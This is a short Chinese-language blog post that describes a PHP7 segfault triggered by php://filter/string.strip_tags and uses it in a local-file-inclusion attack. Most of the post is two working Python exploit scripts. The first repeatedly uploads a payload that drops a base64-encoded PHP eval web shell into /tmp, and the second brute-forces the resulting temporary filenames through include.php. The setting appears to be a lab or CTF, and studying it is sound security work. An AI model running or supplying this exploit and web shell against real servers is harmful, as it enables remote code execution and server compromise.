有一次不小心發(fā)現(xiàn)了一個(gè) php7 的小 BUG

include.php?file=php://filter/string.strip_tags/resource=/etc/passwd

可以導(dǎo)致 php 在執(zhí)行過程中 Segment Fault
想到可以利用在本地文件包含漏洞中
之前在網(wǎng)上的分析文章中 , 本地文件包含漏洞可以讓 php 包含自身從而導(dǎo)致死循環(huán)
然后 php 就會(huì)崩潰 , 如果請(qǐng)求中同時(shí)存在一個(gè)上傳文件的請(qǐng)求的話 , 這個(gè)文件就會(huì)被保留

image.png

參考文章 :

https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

https://github.com/bl4de/security_whitepapers/blob/master/PHP_LFI_rfc1867_temporary_files.pdf

寫了一個(gè)利用腳本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import string
import itertools

charset = string.digits + string.letters

host = "192.168.43.155"
port = 80
base_url = "http://%s:%d" % (host, port)


def upload_file_to_include(url, file_content):
    files = {'file': ('evil.jpg', file_content, 'image/jpeg')}
    try:
        response = requests.post(url, files=files)
    except Exception as e:
        print e


def generate_tmp_files():
    webshell_content = '<?php eval($_REQUEST[c]);?>'.encode(
        "base64").strip().encode("base64").strip().encode("base64").strip()
    file_content = '<?php if(file_put_contents("/tmp/ssh_session_HD89q2", base64_decode("%s"))){echo "flag";}?>' % (
        webshell_content)
    phpinfo_url = "%s/include.php?f=php://filter/string.strip_tags/resource=/etc/passwd" % (
        base_url)
    length = 6
    times = len(charset) ** (length / 2)
    for i in xrange(times):
        print "[+] %d / %d" % (i, times)
        upload_file_to_include(phpinfo_url, file_content)


def main():
    generate_tmp_files()


if __name__ == "__main__":
    main()

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import string

charset = string.digits + string.letters

host = "192.168.43.155"
port = 80
base_url = "http://%s:%d" % (host, port)


def brute_force_tmp_files():
    for i in charset:
        for j in charset:
            for k in charset:
                for l in charset:
                    for m in charset:
                        for n in charset:
                            filename = i + j + k + l + m + n
                            url = "%s/include.php?f=/tmp/php%s" % (
                                base_url, filename)
                            print url
                            try:
                                response = requests.get(url)
                                if 'flag' in response.content:
                                    print "[+] Include success!"
                                    return True
                            except Exception as e:
                                print e
    return False


def main():
    brute_force_tmp_files()


if __name__ == "__main__":
    main()